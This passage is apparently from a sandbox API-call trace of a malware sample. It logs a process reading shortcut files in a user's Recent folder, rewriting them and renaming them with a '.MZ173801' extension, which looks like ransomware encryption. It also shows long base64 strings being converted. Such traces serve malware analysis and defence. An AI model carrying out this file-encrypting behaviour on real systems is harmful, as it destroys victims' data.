lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.726] GetCurrentThreadId () returned 0x1358 [0111.726] GetCurrentThreadId () returned 0x1358 [0111.726] GetCurrentThreadId () returned 0x1358 [0111.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.727] GetCurrentThreadId () returned 0x1358 [0111.727] GetCurrentThreadId () returned 0x1358 [0111.727] GetCurrentThreadId () returned 0x1358 [0111.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T4uSfA p9yNIyW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t4usfa p9yniyw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.727] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.727] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.727] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3ef [0111.728] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.728] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3ef, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3ef, lpOverlapped=0x0) returned 1 [0111.728] CloseHandle (hObject=0x3f4) returned 1 [0111.729] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T4uSfA p9yNIyW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t4usfa p9yniyw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.729] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3ef, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3ef, lpOverlapped=0x0) returned 1 [0111.730] CloseHandle (hObject=0x3f4) returned 1 [0111.731] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T4uSfA p9yNIyW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t4usfa p9yniyw.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T4uSfA p9yNIyW.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t4usfa p9yniyw.lnk.mz173801")) returned 1 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] GetCurrentThreadId () returned 0x1358 [0111.732] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1c8e21, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1c8e21, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec1c8e21, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Tdqlc5SA.lnk", cAlternateFileName="")) returned 1 [0111.732] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.732] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Tdqlc5SA.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\tdqlc5sa.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1c8e21, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1c8e21, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xec1c8e21, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x517)) returned 1 [0111.732] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.732] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.733] GetCurrentThreadId () returned 0x1358 [0111.733] GetCurrentThreadId () returned 0x1358 [0111.733] GetCurrentThreadId () returned 0x1358 [0111.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.734] GetCurrentThreadId () returned 0x1358 [0111.734] GetCurrentThreadId () returned 0x1358 [0111.734] GetCurrentThreadId () returned 0x1358 [0111.734] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Tdqlc5SA.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\tdqlc5sa.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.734] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.734] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.734] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x517 [0111.734] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.734] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x517, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x517, lpOverlapped=0x0) returned 1 [0111.735] CloseHandle (hObject=0x3f4) returned 1 [0111.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Tdqlc5SA.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\tdqlc5sa.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.736] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x517, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x517, lpOverlapped=0x0) returned 1 [0111.737] CloseHandle (hObject=0x3f4) returned 1 [0111.737] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Tdqlc5SA.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\tdqlc5sa.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Tdqlc5SA.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\tdqlc5sa.lnk.mz173801")) returned 1 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] GetCurrentThreadId () returned 0x1358 [0111.738] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9bc9921, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9bc9921, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9bc9921, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="torEQ-P8Pc0pag.flv.lnk", cAlternateFileName="TOREQ-~1.LNK")) returned 1 [0111.738] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.738] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, 